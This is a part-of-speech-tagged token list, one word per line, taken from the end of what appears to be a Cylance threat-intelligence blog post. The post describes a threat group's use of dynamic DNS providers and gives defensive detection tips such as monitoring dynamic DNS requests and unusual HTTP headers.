mention NN O
of IN O
it PRP O
I PRP O
could MD O
find VB O
is VBZ O
in IN O
this DT O
shadowserver NN O
post NN O
: : O
http://blog.shadowserver.org/2012/04/16/beware ADD O
- HYPH O
of IN O
- HYPH O
what WP O
- HYPH O
you- NNP O
download NN O
- HYPH O
recent JJ O
- HYPH O
purported JJ O
- HYPH O
ceiec NN O
- HYPH O
document NN O
- HYPH O
dump NN O
- HYPH O
booby NN O
- HYPH O
trapped/ NN O
related VBN O
to TO O
exploit VB O
documents NNS O
identified VBN O
in IN O
a DT O
data NN O
dump NN O
from IN O
Hardcore NNP O
Charlie NNP O
. . O

If IN O
you PRP O
follow VBP O
the DT O
rabbit NN O
hole NN O
deep RB O
enough RB O
you PRP O
can MD O
eventually RB O
trace VB O
samples NNS O
via IN O
domain NN O
and CC O
IP NNP O
address NN O
crossover NN O
back RB O
to IN O
the DT O
FBI NNP O
flash NN O
# NN O
A-000009-MW NNP O
from IN O
mid JJ O
2013 CD O
. . O

Additional JJ O
domains NNS O
and CC O
IP NN O
addresses NNS O
related VBN O
to IN O
this DT O
group NN O
are VBP O
included VBN O
in IN O
the DT O
appendix NN O
. . O

While IN O
defending VBG O
against IN O
the DT O
constant JJ O
stream NN O
of IN O
new JJ O
malware NN O
from IN O
advanced JJ O
threat NN O
groups NNS O
may MD O
be VB O
difficult JJ O
, , O
organizations NNS O
can MD O
take VB O
some DT O
relatively RB O
easy JJ O
steps NNS O
to TO O
help VB O
identify VB O
intrusions NNS O
. . O

This DT O
group NN O
is VBZ O
among IN O
the DT O
numerous JJ O
threat NN O
actors NNS O
who WP O
rely VBP O
almost RB O
exclusively RB O
on IN O
Dynamic NNP O
DNS NNP O
infrastructure NN O
. . O

They PRP O
seem VBP O
to TO O
prefer VB O
ChangeIP NNP O
( -LRB- O
https://www.changeip.com ADD O
/ SYM O
services NNS O
/ SYM O
free JJ O
- HYPH O
dynamic JJ O
- HYPH O
dns/(https://www.changeip.com ADD O
/ NFP O
services NNS O
/ SYM O
free- RB O
dynamic JJ O
- HYPH O
dns/ NN O
) -RRB- O
) -RRB- O
and CC O
Afraid NNP O
( -LRB- O
https://freedns.afraid.org/(https://freedns.afraid.org/ ADD O
) -RRB- O
) -RRB- O
for IN O
free JJ O
DNS NNP O
services NNS O
, , O
although IN O
they PRP O
previously RB O
heavily RB O
used VBN O
Sitelutions NNS O
( -LRB- O
https://sitelutions.com/info/sldns(https://sitelutions.com/info/sldns ADD O
) -RRB- O
) -RRB- O
. . O

While IN O
there EX O
are VBP O
some DT O
legitimate JJ O
instances NNS O
of IN O
dynamic JJ O
DNS NN O
in IN O
corporate JJ O
environments NNS O
, , O
it PRP O
only RB O
accounts VBZ O
for IN O
a DT O
small JJ O
percentage NN O
of IN O
traffic NN O
. . O

Monitoring NN O
and/or CC O
blocking VBG O
dynamic JJ O
DNS NN O
requests NNS O
should MD O
help VB O
detect VB O
attacks NNS O
by IN O
this DT O
actor NN O
. . O

Any DT O
dynamic JJ O
DNS NN O
domains NNS O
that WDT O
resolve VBP O
to IN O
non AFX O
- HYPH O
routable JJ O
IP NN O
addresses NNS O
, , O
like IN O
127.0.0.1 CD O
or CC O
private JJ O
IP NNP O
addresses NNS O
, , O
should MD O
be VB O
thoroughly RB O
investigated VBN O
. . O

The DT O
HTTP NNP O
traffic NN O
generated VBN O
by IN O
both DT O
samples NNS O
uses VBZ O
a DT O
limited JJ O
number NN O
of IN O
header NN O
fields NNS O
, , O
which WDT O
is VBZ O
substantially RB O
different JJ O
from IN O
the DT O
majority NN O
of IN O
traffic NN O
generated VBN O
by IN O
modern JJ O
browsers NNS O
. . O

As IN O
always RB O
, , O
do VB O
n't RB O
open VB O
E NNP O
- HYPH O
mail NN O
attachments NNS O
from IN O
untrusted JJ O
parties NNS O
. . O

Tags NNS O
: : O
CylanceSPEAR(http://blog.cylance.com ADD O
/ SYM O
topic NN O
/ SYM O
cylancespear NN O
) -RRB- O
Back RB O
to IN O
Blog(http://blog.cylance.com NNP O
) -RRB- O

